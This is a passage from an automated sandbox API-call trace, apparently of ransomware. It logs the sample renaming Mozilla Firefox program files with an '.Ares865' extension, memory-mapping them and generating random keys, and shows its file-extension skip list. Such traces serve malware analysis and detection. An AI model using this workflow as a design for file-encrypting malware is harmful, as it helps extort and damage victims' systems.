lpString2="maintenanceservice.exe" | out: lpString1="maintenanceservice.exe") returned="maintenanceservice.exe" [0126.522] lstrlenW (lpString="maintenanceservice.exe") returned 22 [0126.522] lstrlenW (lpString="Ares865") returned 7 [0126.522] lstrcmpiW (lpString1="ice.exe", lpString2="Ares865") returned 1 [0126.522] lstrlenW (lpString=".dll") returned 4 [0126.522] lstrcmpiW (lpString1="maintenanceservice.exe", lpString2=".dll") returned 1 [0126.522] lstrlenW (lpString=".lnk") returned 4 [0126.522] lstrcmpiW (lpString1="maintenanceservice.exe", lpString2=".lnk") returned 1 [0126.522] lstrlenW (lpString=".ini") returned 4 [0126.522] lstrcmpiW (lpString1="maintenanceservice.exe", lpString2=".ini") returned 1 [0126.522] lstrlenW (lpString=".sys") returned 4 [0126.522] lstrcmpiW (lpString1="maintenanceservice.exe", lpString2=".sys") returned 1 [0126.522] lstrlenW (lpString="maintenanceservice.exe") returned 22 [0126.522] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\maintenanceservice.exe.Ares865") returned 69 [0126.522] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\maintenanceservice.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\maintenanceservice.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\maintenanceservice.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\maintenanceservice.exe.ares865"), dwFlags=0x1) returned 1 [0126.527] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\maintenanceservice.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\maintenanceservice.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0126.527] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=119408) returned 1 [0126.527] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0126.528] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0126.528] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.528] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d570, lpName=0x0) returned 0x170 [0126.530] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d570) returned 0x190000 [0126.551] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0126.552] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0126.552] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.554] lstrcpyW (in: lpString1=0x2cce44e, lpString2="maintenanceservice_installer.exe" | out: lpString1="maintenanceservice_installer.exe") returned="maintenanceservice_installer.exe" [0126.554] lstrlenW (lpString="maintenanceservice_installer.exe") returned 32 [0126.554] lstrlenW (lpString="Ares865") returned 7 [0126.554] lstrcmpiW (lpString1="ler.exe", lpString2="Ares865") returned 1 [0126.554] lstrlenW (lpString=".dll") returned 4 [0126.554] lstrcmpiW (lpString1="maintenanceservice_installer.exe", lpString2=".dll") returned 1 [0126.554] lstrlenW (lpString=".lnk") returned 4 [0126.554] lstrcmpiW (lpString1="maintenanceservice_installer.exe", lpString2=".lnk") returned 1 [0126.554] lstrlenW (lpString=".ini") returned 4 [0126.554] lstrcmpiW (lpString1="maintenanceservice_installer.exe", lpString2=".ini") returned 1 [0126.554] lstrlenW (lpString=".sys") returned 4 [0126.554] lstrcmpiW (lpString1="maintenanceservice_installer.exe", lpString2=".sys") returned 1 [0126.554] lstrlenW (lpString="maintenanceservice_installer.exe") returned 32 [0126.554] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\maintenanceservice_installer.exe.Ares865") returned 79 [0126.554] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\maintenanceservice_installer.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\maintenanceservice_installer.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\maintenanceservice_installer.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\maintenanceservice_installer.exe.ares865"), dwFlags=0x1) returned 1 [0126.557] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\maintenanceservice_installer.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\maintenanceservice_installer.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0126.557] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=194552) returned 1 [0126.557] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0126.558] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0126.558] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.558] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2fb00, lpName=0x0) returned 0x170 [0126.560] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2fb00) returned 0x420000 [0126.577] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0126.578] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0126.578] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.581] lstrcpyW (in: lpString1=0x2cce44e, lpString2="mozalloc.dll" | out: lpString1="mozalloc.dll") returned="mozalloc.dll" [0126.581] lstrlenW (lpString="mozalloc.dll") returned 12 [0126.581] lstrlenW (lpString="Ares865") returned 7 [0126.581] lstrcmpiW (lpString1="loc.dll", lpString2="Ares865") returned 1 [0126.581] lstrlenW (lpString=".dll") returned 4 [0126.581] lstrcmpiW (lpString1="mozalloc.dll", lpString2=".dll") returned 1 [0126.581] lstrlenW (lpString=".lnk") returned 4 [0126.581] lstrcmpiW (lpString1="mozalloc.dll", lpString2=".lnk") returned 1 [0126.581] lstrlenW (lpString=".ini") returned 4 [0126.581] lstrcmpiW (lpString1="mozalloc.dll", lpString2=".ini") returned 1 [0126.581] lstrlenW (lpString=".sys") returned 4 [0126.581] lstrcmpiW (lpString1="mozalloc.dll", lpString2=".sys") returned 1 [0126.581] lstrlenW (lpString="mozalloc.dll") returned 12 [0126.582] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\mozalloc.dll.Ares865") returned 59 [0126.582] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\mozalloc.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozalloc.dll"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\mozalloc.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozalloc.dll.ares865"), dwFlags=0x1) returned 1 [0126.586] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\mozalloc.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozalloc.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0126.586] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17008) returned 1 [0126.587] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0126.587] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0126.587] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.588] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4570, lpName=0x0) returned 0x170 [0126.589] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4570) returned 0x190000 [0126.594] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0126.595] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0126.595] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.595] lstrcpyW (in: lpString1=0x2cce44e, lpString2="mozglue.dll" | out: lpString1="mozglue.dll") returned="mozglue.dll" [0126.595] lstrlenW (lpString="mozglue.dll") returned 11 [0126.595] lstrlenW (lpString="Ares865") returned 7 [0126.595] lstrcmpiW (lpString1="lue.dll", lpString2="Ares865") returned 1 [0126.596] lstrlenW (lpString=".dll") returned 4 [0126.596] lstrcmpiW (lpString1="mozglue.dll", lpString2=".dll") returned 1 [0126.596] lstrlenW (lpString=".lnk") returned 4 [0126.596] lstrcmpiW (lpString1="mozglue.dll", lpString2=".lnk") returned 1 [0126.596] lstrlenW (lpString=".ini") returned 4 [0126.596] lstrcmpiW (lpString1="mozglue.dll", lpString2=".ini") returned 1 [0126.596] lstrlenW (lpString=".sys") returned 4 [0126.596] lstrcmpiW (lpString1="mozglue.dll", lpString2=".sys") returned 1 [0126.596] lstrlenW (lpString="mozglue.dll") returned 11 [0126.596] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\mozglue.dll.Ares865") returned 58 [0126.596] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\mozglue.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozglue.dll"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\mozglue.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozglue.dll.ares865"), dwFlags=0x1) returned 1 [0126.605] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\mozglue.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozglue.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0126.605] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=130672) returned 1 [0126.605] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0126.606] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0126.606] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.606] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20170, lpName=0x0) returned 0x170 [0126.608] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x20170) returned 0x420000 [0126.647] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0126.648] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0126.648] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.650] lstrcpyW (in: lpString1=0x2cce44e, lpString2="mozjs.dll" | out: lpString1="mozjs.dll") returned="mozjs.dll" [0126.650] lstrlenW (lpString="mozjs.dll") returned 9 [0126.650] lstrlenW (lpString="Ares865") returned 7 [0126.650] lstrcmpiW (lpString1="zjs.dll", lpString2="Ares865") returned 1 [0126.650] lstrlenW (lpString=".dll") returned 4 [0126.650] lstrcmpiW (lpString1="mozjs.dll", lpString2=".dll") returned 1 [0126.650] lstrlenW (lpString=".lnk") returned 4 [0126.650] lstrcmpiW (lpString1="mozjs.dll", lpString2=".lnk") returned 1 [0126.650] lstrlenW (lpString=".ini") returned 4 [0126.650] lstrcmpiW (lpString1="mozjs.dll", lpString2=".ini") returned 1 [0126.650] lstrlenW (lpString=".sys") returned 4 [0126.650] lstrcmpiW (lpString1="mozjs.dll", lpString2=".sys") returned 1 [0126.650] lstrlenW (lpString="mozjs.dll") returned 9 [0126.651] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\mozjs.dll.Ares865") returned 56 [0126.651] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\mozjs.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozjs.dll"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\mozjs.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozjs.dll.ares865"), dwFlags=0x1) returned 1 [0126.653] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\mozjs.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\mozjs.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0126.653] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3368048) returned 1 [0126.654] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0126.654] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0126.654] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.655] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x336770, lpName=0x0) returned 0x170 [0126.659] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x136770) returned 0x3030000 [0126.877] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0126.878] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0126.878] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.899] lstrcpyW (in: lpString1=0x2cce44e, lpString2="msvcp100.dll" | out: lpString1="msvcp100.dll") returned="msvcp100.dll" [0126.899] lstrlenW (lpString="msvcp100.dll") returned 12 [0126.899] lstrlenW (lpString="Ares865") returned 7 [0126.899] lstrcmpiW (lpString1="100.dll", lpString2="Ares865") returned -1 [0126.899] lstrlenW (lpString=".dll") returned 4 [0126.899] lstrcmpiW (lpString1="msvcp100.dll", lpString2=".dll") returned 1 [0126.899] lstrlenW (lpString=".lnk") returned 4 [0126.899] lstrcmpiW (lpString1="msvcp100.dll", lpString2=".lnk") returned 1 [0126.899] lstrlenW (lpString=".ini") returned 4 [0126.899] lstrcmpiW (lpString1="msvcp100.dll", lpString2=".ini") returned 1 [0126.899] lstrlenW (lpString=".sys") returned 4 [0126.899] lstrcmpiW (lpString1="msvcp100.dll", lpString2=".sys") returned 1 [0126.899] lstrlenW (lpString="msvcp100.dll") returned 12 [0126.899] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp100.dll.Ares865") returned 59 [0126.899] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp100.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\msvcp100.dll"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp100.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\msvcp100.dll.ares865"), dwFlags=0x1) returned 1 [0126.903] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp100.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\msvcp100.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0126.903] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=421200) returned 1 [0126.903] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0126.904] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0126.904] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.904] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x67050, lpName=0x0) returned 0x170 [0126.906] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x67050) returned 0x420000 [0126.937] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0126.937] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0126.938] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.944] lstrcpyW (in: lpString1=0x2cce44e, lpString2="msvcr100.dll" | out: lpString1="msvcr100.dll") returned="msvcr100.dll" [0126.944] lstrlenW (lpString="msvcr100.dll") returned 12 [0126.944] lstrlenW (lpString="Ares865") returned 7 [0126.944] lstrcmpiW (lpString1="100.dll", lpString2="Ares865") returned -1 [0126.944] lstrlenW (lpString=".dll") returned 4 [0126.944] lstrcmpiW (lpString1="msvcr100.dll", lpString2=".dll") returned 1 [0126.944] lstrlenW (lpString=".lnk") returned 4 [0126.944] lstrcmpiW (lpString1="msvcr100.dll", lpString2=".lnk") returned 1 [0126.944] lstrlenW (lpString=".ini") returned 4 [0126.944] lstrcmpiW (lpString1="msvcr100.dll", lpString2=".ini") returned 1 [0126.944] lstrlenW (lpString=".sys") returned 4 [0126.944] lstrcmpiW (lpString1="msvcr100.dll", lpString2=".sys") returned 1 [0126.944] lstrlenW (lpString="msvcr100.dll") returned 12 [0126.945] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr100.dll.Ares865") returned 59 [0126.945] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr100.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\msvcr100.dll"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr100.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\msvcr100.dll.ares865"), dwFlags=0x1) returned 1 [0126.948] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr100.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\msvcr100.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0126.948] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=770384) returned 1 [0126.948] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0126.949] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0126.949] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.949] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbc450, lpName=0x0) returned 0x170 [0126.951] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbc450) returned 0xdd0000 [0126.983] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0126.984] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0126.984] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.995] lstrcpyW (in: lpString1=0x2cce44e, lpString2="nss3.dll" | out: lpString1="nss3.dll") returned="nss3.dll" [0126.995] lstrlenW (lpString="nss3.dll") returned 8 [0126.995] lstrlenW (lpString="Ares865") returned 7 [0126.995] lstrcmpiW (lpString1="ss3.dll", lpString2="Ares865") returned 1 [0126.995] lstrlenW (lpString=".dll") returned 4 [0126.995] lstrcmpiW (lpString1="nss3.dll", lpString2=".dll") returned 1 [0126.995] lstrlenW (lpString=".lnk") returned 4 [0126.995] lstrcmpiW (lpString1="nss3.dll", lpString2=".lnk") returned 1 [0126.995] lstrlenW (lpString=".ini") returned 4 [0126.995] lstrcmpiW (lpString1="nss3.dll", lpString2=".ini") returned 1 [0126.995] lstrlenW (lpString=".sys") returned 4 [0126.995] lstrcmpiW (lpString1="nss3.dll", lpString2=".sys") returned 1 [0126.995] lstrlenW (lpString="nss3.dll") returned 8 [0126.995] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll.Ares865") returned 55 [0126.995] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\nss3.dll"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\nss3.dll.ares865"), dwFlags=0x1) returned 1 [0126.998] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\nss3.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0126.999] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1775728) returned 1 [0126.999] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.000] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.000] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.000] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1b1b70, lpName=0x0) returned 0x170 [0127.001] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1b1b70) returned 0x3030000 [0127.072] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.078] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.078] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.103] lstrcpyW (in: lpString1=0x2cce44e, lpString2="nssckbi.dll" | out: lpString1="nssckbi.dll") returned="nssckbi.dll" [0127.103] lstrlenW (lpString="nssckbi.dll") returned 11 [0127.103] lstrlenW (lpString="Ares865") returned 7 [0127.103] lstrcmpiW (lpString1="kbi.dll", lpString2="Ares865") returned 1 [0127.103] lstrlenW (lpString=".dll") returned 4 [0127.103] lstrcmpiW (lpString1="nssckbi.dll", lpString2=".dll") returned 1 [0127.103] lstrlenW (lpString=".lnk") returned 4 [0127.103] lstrcmpiW (lpString1="nssckbi.dll", lpString2=".lnk") returned 1 [0127.103] lstrlenW (lpString=".ini") returned 4 [0127.103] lstrcmpiW (lpString1="nssckbi.dll", lpString2=".ini") returned 1 [0127.103] lstrlenW (lpString=".sys") returned 4 [0127.103] lstrcmpiW (lpString1="nssckbi.dll", lpString2=".sys") returned 1 [0127.103] lstrlenW (lpString="nssckbi.dll") returned 11 [0127.104] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\nssckbi.dll.Ares865") returned 58 [0127.104] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nssckbi.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssckbi.dll"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nssckbi.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssckbi.dll.ares865"), dwFlags=0x1) returned 1 [0127.107] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nssckbi.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssckbi.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0127.107] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=393328) returned 1 [0127.107] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0127.108] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0127.108] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.108] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x60370, lpName=0x0) returned 0x170 [0127.113] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x60370) returned 0x420000 [0127.128] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0127.128] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0127.128] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0127.134] lstrcpyW (in: 